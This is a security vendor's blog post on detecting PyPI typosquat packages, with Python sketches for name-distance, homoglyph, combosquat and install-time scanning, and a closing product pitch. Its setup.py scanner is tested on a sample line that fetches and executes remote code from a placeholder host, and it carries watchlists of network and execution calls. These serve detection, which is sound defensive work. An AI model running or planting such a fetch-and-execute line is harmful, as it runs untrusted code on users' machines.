Open Source Security

PyPI Typosquatting Detection at Scale

Typosquatting remains a steady drumbeat on PyPI. Here is what detection actually looks like when you're trying to catch it at ecosystem scale, and where the interesting edges are.

Typosquatting on PyPI is not a new story. The first serious academic treatment, Vaidya et al.'s "Typosquatting and Combosquatting Attacks on the Python Ecosystem" at ESORICS 2017, already had enough material to fill a paper. Seven years later, the problem hasn't gone away — if anything, the industrial research teams at Phylum, Checkmarx, Socket, Snyk, and ReversingLabs collectively publish enough typosquat-removal reports each quarter to keep the topic perennial. Phylum's 2023 "State of the Software Supply Chain" report counted 1,490 typosquat packages removed from PyPI across that year. This is a technical look at what detection actually takes when you're trying to catch this class of attack at the scale of the whole PyPI ecosystem.

The Threat, Concretely

Typosquatting on PyPI works because a flat global namespace treats requesrs, requesst, reqeusts, rerquests, and requests as five distinct valid package names. A user who mistypes the real one, or an AI code assistant that hallucinates a close variant, has a non-trivial chance of landing on a squatter.
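To make the namespace point concrete, here is a minimal sketch of the name normalization described in PEP 503 (lowercase, with runs of hyphens, underscores, and periods collapsed to a single hyphen). The variable names are illustrative only. It shows that normalization merges case and separator variants into one project name but leaves misspellings as separate names.

```python
import re


def normalize_name(name: str) -> str:
    """PEP 503 normalization: lowercase, runs of '-', '_', '.' become one '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


# The five names from the paragraph above.
variants = ["requesrs", "requesst", "reqeusts", "rerquests", "requests"]

# Case differences collapse to a single project name...
same_project = {normalize_name(n) for n in ["Requests", "requests", "REQUESTS"]}

# ...but misspellings survive normalization as distinct names.
distinct = {normalize_name(n) for n in variants}

print(len(same_project), len(distinct))
```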

The payload side has become more sophisticated over the years. Early typosquats were often proof-of-concept or crude crypto stealers. Modern campaigns, based on reporting from Phylum and Checkmarx through 2023 and 2024, routinely include:

Install-time code execution via setup.py or pyproject.toml build hooks that exfiltrate environment variables before the install even completes.

Staged payloads that fetch second-stage malware from external infrastructure only if certain environment conditions are met (real developer machine, not a sandbox).

Targeted campaigns against specific ecosystems, for example AI/ML typosquats aimed at capturing API keys for cloud LLM providers, which became a noticeable trend through 2024.

The dwell time between publish and detection has, on the whole, decreased — industry reporting through 2024 suggests most typosquat packages are removed within 24-72 hours of publish. But "most" is not "all," and the tail is where real damage happens.

Distance-Based Detection

The starting-point technique for typosquat detection is string distance. Compute Damerau-Levenshtein distance between a candidate new package name and every established popular package name; if the distance is small (typically 1 or 2) and the target is popular, flag the candidate.

This works reasonably well for a large class of squats and is roughly what PyPI's own registration-time confusability check does (the check rejects obvious close variants of popular names when a new registration is attempted). Warehouse's implementation lives in the warehouse.packaging module and has been iterated on since 2018.
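The distance check can be sketched in a few lines. This is an illustration, not PyPI's or any vendor's implementation: it uses the optimal string alignment variant of Damerau-Levenshtein (adjacent transpositions count as one edit), and the POPULAR set, the flag_candidate helper, and the threshold of 2 are assumptions made for the example.

```python
def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance (restricted Damerau-Levenshtein)."""
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(
                d[i - 1][j] + 1,         # deletion
                d[i][j - 1] + 1,         # insertion
                d[i - 1][j - 1] + cost,  # substitution
            )
            # Adjacent transposition, e.g. "eu" <-> "ue".
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]


# Hypothetical stand-in for a maintained popular-package list.
POPULAR = {"requests", "numpy", "urllib3"}


def flag_candidate(name, popular=POPULAR, max_distance=2):
    """Return (target, distance) pairs for popular names close to `name`."""
    hits = []
    for target in popular:
        if name == target:
            continue  # the popular package itself is not a squat
        dist = osa_distance(name, target)
        if dist <= max_distance:
            hits.append((target, dist))
    return sorted(hits, key=lambda hit: (hit[1], hit[0]))
```

Calling flag_candidate("reqeusts") returns the single pair ("requests", 1), because swapping the adjacent "e" and "u" is one edit.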

Where distance-based detection breaks:

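Homoglyphs. reqυests (using a Greek upsilon) is visually indistinguishable from requests when rendered, but it is a different string. Its Damerau-Levenshtein distance from requests is 1, the same as any ordinary one-character substitution, so the distance score says nothing about how confusable the two names look. PyPI project names are restricted to ASCII letters, digits, periods, hyphens, and underscores, so the realistic variants there are ASCII lookalikes such as l/1/I and O/0. Either way, detection needs Unicode normalization and visual-confusability comparison, which is a distinct technique.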

Combosquatting. python-requests is not close to requests in string distance, but it's close enough in semantic space that a confused user might install it. Distance-based detection misses these entirely.

Scale. PyPI has hundreds of thousands of packages and gets thousands of new registrations daily. Comparing every new registration to every existing popular package is a cross-product, and naive implementations get slow quickly.
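Each of the three gaps above has a simple first-order mitigation, sketched below under stated assumptions. The CONFUSABLES table is a tiny hand-written stand-in for a real confusables dataset, the AFFIXES set is a hypothetical list of filler tokens, and the length index relies only on the fact that edit distance can never be smaller than the difference in length between two strings.

```python
import re
import unicodedata
from collections import defaultdict

# Tiny illustrative table; a real system would load a full confusables dataset.
CONFUSABLES = str.maketrans({
    "\u03c5": "u",  # Greek small upsilon
    "\u0430": "a",  # Cyrillic small a
    "\u0435": "e",  # Cyrillic small ie
    "\u043e": "o",  # Cyrillic small o
    "0": "o",
    "1": "l",
})


def skeleton(name: str) -> str:
    """Fold a name to a form in which lookalike characters compare equal."""
    folded = unicodedata.normalize("NFKC", name).casefold()
    return folded.translate(CONFUSABLES)


def is_homoglyph_of(candidate: str, target: str) -> bool:
    return candidate != target and skeleton(candidate) == skeleton(target)


# Hypothetical filler tokens commonly glued onto a popular name.
AFFIXES = {"python", "py", "lib", "client", "sdk", "api", "dev"}


def combosquat_target(candidate: str, popular):
    """Return the popular name embedded in `candidate`, or None."""
    tokens = [t for t in re.split(r"[-_.]+", candidate.lower()) if t]
    if len(tokens) < 2:
        return None
    for target in popular:
        if target in tokens and all(t == target or t in AFFIXES for t in tokens):
            return target
    return None


def build_length_index(popular):
    """Bucket popular names by length so most comparisons can be skipped."""
    index = defaultdict(list)
    for name in popular:
        index[len(name)].append(name)
    return index


def comparison_targets(candidate: str, index, max_distance: int = 2):
    """Only names within `max_distance` of the candidate's length can match."""
    targets = []
    low, high = len(candidate) - max_distance, len(candidate) + max_distance
    for length in range(low, high + 1):
        targets.extend(index.get(length, []))
    return targets
```

The combosquat check here only handles popular names that are a single token; multi-token targets would need a different tokenization, which this sketch does not attempt.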

Behavior-Based Detection

The more interesting class of detection doesn't look at the name at all — it looks at what the package does.

Socket and Phylum have written extensively about this pattern through 2023 and 2024. The signals they look for include:

Network calls during install. Legitimate packages almost never phone home during pip install. A package whose setup.py makes HTTP requests to external hosts is immediately suspicious, regardless of its name.

Suspicious dependencies or imports. A package called requets that imports requests itself and wraps the real package's functions is a common pattern: it lets squatters make the malicious package appear to work while exfiltrating data underneath.

Short-lived publisher identities. An account that registered a week ago, published one package with a close-to-popular name, and has no other activity is a different risk profile than a long-lived maintainer shipping a typo-adjacent name.

Zero-history first release. A package where the 0.0.1 release already includes complex install-time code and no corresponding development history on any SCM is worth a hard look.
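The install-time signal can be approximated without ever running the package. The following is a minimal sketch, not any vendor's detector: it parses setup.py source with Python's ast module and reports imports and calls from two hypothetical watchlists (SUSPICIOUS_MODULES and SUSPICIOUS_CALLS are assumptions for illustration). It does not cover pyproject.toml build hooks or obfuscated code.

```python
import ast

# Hypothetical watchlists; real detectors use far richer rules.
SUSPICIOUS_MODULES = {"urllib", "requests", "socket", "http", "subprocess", "base64"}
SUSPICIOUS_CALLS = {"exec", "eval", "compile", "__import__"}


def scan_setup_source(source: str):
    """Statically list suspicious imports and calls in setup.py source text."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                root = alias.name.split(".")[0]
                if root in SUSPICIOUS_MODULES:
                    findings.append(f"import:{root}")
        elif isinstance(node, ast.ImportFrom):
            root = (node.module or "").split(".")[0]
            if root in SUSPICIOUS_MODULES:
                findings.append(f"import:{root}")
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in SUSPICIOUS_CALLS:
                findings.append(f"call:{node.func.id}")
    return sorted(set(findings))


sample = (
    "import os\n"
    "import urllib.request\n"
    "from setuptools import setup\n"
    "exec(urllib.request.urlopen('http://example.invalid/x').read())\n"
    "setup(name='demo')\n"
)
print(scan_setup_source(sample))
```

Because the source is only parsed, never executed, the scan is safe to run outside a sandbox. A hit is a reason to look closer, not proof of malice.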

These signals, individually, have false positives. A new legitimate package might have short history, suspicious-looking dependencies, or install-time code for valid reasons. But in combination, they produce a much cleaner detection than name distance alone.
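One way to express "in combination" is a simple additive score. The sketch below is an assumption-laden illustration: the Signals fields mirror the signals listed above, but the point values, the 30-day publisher cutoff, and the review threshold of 50 are invented for the example and would need tuning against real data.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Signals:
    install_time_network: bool
    wraps_popular_package: bool
    publisher_age_days: int
    complex_first_release: bool
    name_distance: Optional[int]  # None when no popular name is close


def risk_score(s: Signals) -> int:
    """Sum hypothetical point values for each signal that fires."""
    score = 0
    if s.install_time_network:
        score += 40
    if s.wraps_popular_package:
        score += 20
    if s.publisher_age_days < 30:
        score += 15
    if s.complex_first_release:
        score += 15
    if s.name_distance is not None and s.name_distance <= 2:
        score += 30
    return score


def needs_review(s: Signals, threshold: int = 50) -> bool:
    return risk_score(s) >= threshold


# A new but legitimate package: two weak signals, below the threshold.
new_legit = Signals(False, False, 5, True, None)
# A likely squat: install-time network call, close name, fresh publisher.
likely_squat = Signals(True, False, 3, False, 1)
print(needs_review(new_legit), needs_review(likely_squat))
```

With these weights no single weak signal crosses the threshold, which matches the point above that individual signals produce false positives.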

The AI-Hallucination Axis

Starting in 2023 and accelerating through 2024, LLM-assisted coding has added a new vector. When GitHub Copilot, ChatGPT, or similar assistants suggest a pip install X command, they occasionally hallucinate a package name that doesn't exist. Security researchers from Lasso Security and Vulcan Cyber documented this in 2023 as "package hallucination," showing that specific LLM-generated names were predictable enough that an attacker could pre-register the hallucinated names and wait for victims to run the install command.

Detection for AI-hallucinated squats has a specific flavor: the target name isn't a typo of requests, it's a plausible-but-non-existent name that an AI generates. The useful signal is registration of new packages with names that don't exist on PyPI today but that are semantically adjacent to popular packages. Active monitoring of LLM outputs for pip install suggestions, matched against the live PyPI namespace, is a current research area.
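The matching step can be sketched as follows. This assumes install commands appear on their own line in the assistant's output, and that known_names is a snapshot of registered project names obtained elsewhere; both are assumptions for the example, and fastjsonx is a made-up name. Options that take an argument, such as -r requirements.txt, are not handled.

```python
import re

# Matches "pip install ...", "pip3 install ...", and "python -m pip install ...".
PIP_INSTALL = re.compile(
    r"^\s*\$?\s*(?:python3?\s+-m\s+)?pip3?\s+install\s+(.+)$", re.MULTILINE
)
NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def normalize_name(name: str) -> str:
    """PEP 503 normalization so spelling variants of one project compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def suggested_packages(llm_output: str):
    """Collect normalized package names from pip install lines."""
    names = set()
    for match in PIP_INSTALL.finditer(llm_output):
        for token in match.group(1).split():
            if token.startswith("-"):
                continue  # skip flags such as -U or --upgrade
            # Drop version specifiers, extras, markers, and direct references.
            base = re.split(r"[<>=!~\[;@ ]", token, maxsplit=1)[0]
            if NAME.fullmatch(base):
                names.add(normalize_name(base))
    return names


def unregistered(llm_output: str, known_names):
    """Names the assistant suggested that are absent from the snapshot."""
    return sorted(suggested_packages(llm_output) - set(known_names))


text = (
    "Try this:\n"
    "$ pip install requests fastjsonx==1.2\n"
    "python -m pip install -U Flask_Login\n"
)
print(unregistered(text, {"requests", "flask-login"}))
```

Names that come back from unregistered are the ones worth watching: if one of them is registered later, that registration is a candidate squat.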

Ecosystem-Scale Detection

Pulling this together into a real detection system at ecosystem scale requires a pipeline that:

Ingests every new PyPI registration as it happens (via the JSON API or the BigQuery audit dataset).

Runs string-distance, homoglyph, and combosquatting checks against a maintained popular-package list.

Pulls the package's source distribution and inspects setup.py, pyproject.toml, and the module entry points for install-time behavior.

Cross-references the publisher account against age, prior publish history, and any known abuse signals.

Correlates with the public LLM-output corpora when available.

Produces a prioritized queue of candidate squats for human review.
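The shape of such a pipeline, reduced to its skeleton, might look like the sketch below. Everything here is hypothetical: the Registration record, the lambda checks, and their point values are placeholders for the real stages listed above, and ingestion is replaced by an in-memory list. The part worth noting is the last step, where a heap orders candidates so reviewers see the highest-scoring ones first.

```python
import heapq
from dataclasses import dataclass, field


@dataclass
class Registration:
    name: str
    publisher_age_days: int
    setup_source: str


@dataclass(order=True)
class QueueItem:
    priority: int  # negative score, because heapq pops the smallest first
    name: str = field(compare=False)
    reasons: list = field(compare=False, default_factory=list)


def run_pipeline(registrations, checks):
    """Run every check on every registration and return a review queue."""
    heap = []
    for reg in registrations:
        score, reasons = 0, []
        for label, check in checks:
            points = check(reg)
            if points:
                score += points
                reasons.append(label)
        if score:
            heapq.heappush(heap, QueueItem(-score, reg.name, reasons))
    return [heapq.heappop(heap) for _ in range(len(heap))]


# Placeholder checks standing in for the real name, content, and publisher stages.
checks = [
    ("name", lambda r: 30 if r.name in {"reqeusts"} else 0),
    ("install_code", lambda r: 40 if "urlopen" in r.setup_source else 0),
    ("new_publisher", lambda r: 15 if r.publisher_age_days < 30 else 0),
]

registrations = [
    Registration("tidy-tables", 400, "setup()"),
    Registration("newlib", 2, "setup()"),
    Registration("reqeusts", 3, "urlopen('http://example.invalid')"),
]
queue = run_pipeline(registrations, checks)
print([item.name for item in queue])
```

Keeping each stage as an independent function that returns points makes it straightforward to add or retire a signal without touching the queueing logic.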

Research groups and vendors running this pipeline at scale report removal rates in the thousands per year, as referenced above. The work isn't glamorous — much of it is running queries and reviewing candidate lists — but it's meaningfully better than the pre-2020 baseline where typosquat detection was ad hoc.

PyPI's Own Role

PyPI admins do not run a comprehensive typosquat-detection pipeline of their own, as far as any public documentation suggests. They rely on:

The registration-time confusability check, which catches the obvious cases.

Community reports from researchers at the vendors above.

The PEP 541 removal process, which formalizes the response once a squat is reported.

This appears to be a deliberate allocation. Ecosystem-scale detection is expensive to run, benefits from commercial-grade intelligence feeds, and is happening in the vendor ecosystem. PyPI's role is to be a responsive authority for removal rather than a first-line detector.

What Consumers Can Do

For an organization consuming from PyPI, the practical guidance:

Pin your dependencies. Floating versions and typo-adjacent names are a worst-case combination.

Use a tool that checks your dependency graph against known-squatter lists. Safeguard, Snyk, Socket, and Phylum all offer this.

Treat install-time errors seriously. A failing pip install sometimes means something went wrong during a malicious package's exfiltration step.

Run pip install in a sandboxed CI environment rather than on developer laptops where credentials live in the clear.

And review your dependency graph for packages whose names are one edit away from something more popular. Legitimate near-name packages exist, but they deserve a second look.
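Two of these checks, pinning and near-name review, are easy to script against a requirements file. The sketch below is a rough illustration rather than a replacement for the tools named above: it treats only an exact == specifier as pinned, ignores hash pinning and option lines, and takes the popular-name set as an input you would supply yourself.

```python
import re

REQ_LINE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(\[[^\]]*\])?\s*(.*)$")


def normalize_name(name: str) -> str:
    return re.sub(r"[-_.]+", "-", name).lower()


def one_edit_apart(a: str, b: str) -> bool:
    """True when one insert, delete, substitute, or adjacent swap turns a into b."""
    if a == b or abs(len(a) - len(b)) > 1:
        return False
    if len(a) > len(b):
        a, b = b, a
    i = 0
    while i < len(a) and a[i] == b[i]:
        i += 1
    if len(a) == len(b):
        substituted = a[i + 1:] == b[i + 1:]
        swapped = a[i + 2:] == b[i + 2:] and a[i:i + 2] == b[i:i + 2][::-1]
        return substituted or swapped
    return a[i:] == b[i + 1:]  # b has one extra character at position i


def audit_requirements(text: str, popular):
    """Flag unpinned entries and names one edit away from a popular name."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith("-"):
            continue  # skip blanks and option lines such as -r other.txt
        match = REQ_LINE.match(line)
        if not match:
            continue
        name, spec = normalize_name(match.group(1)), match.group(3)
        if not spec.startswith("=="):
            findings.append((name, "unpinned"))
        for target in sorted(popular):
            if one_edit_apart(name, target):
                findings.append((name, f"one edit from {target}"))
    return findings


reqs = "requests==2.31.0\nnumpy>=1.26  # floating\nreqeusts\n-r other.txt\n"
for finding in audit_requirements(reqs, {"requests", "numpy"}):
    print(finding)
```

A near-name finding is a prompt for a human look, since legitimate packages with similar names do exist.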

How Safeguard Helps

Safeguard runs ecosystem-scale typosquat detection across PyPI and maintains a rolling allow-deny list of candidate squatters that is checked against every dependency your projects install. When a transitive dependency resolves to a name that trips a squatter heuristic, Safeguard raises it in your findings feed with the specific signal that flagged it — name distance, homoglyph, suspicious install-time behavior, or short-lived publisher history. For organizations concerned about AI-hallucinated package names in generated code, Safeguard cross-references suggested package names against the live PyPI namespace and flags installs of recently-registered candidate squats before they land in production.
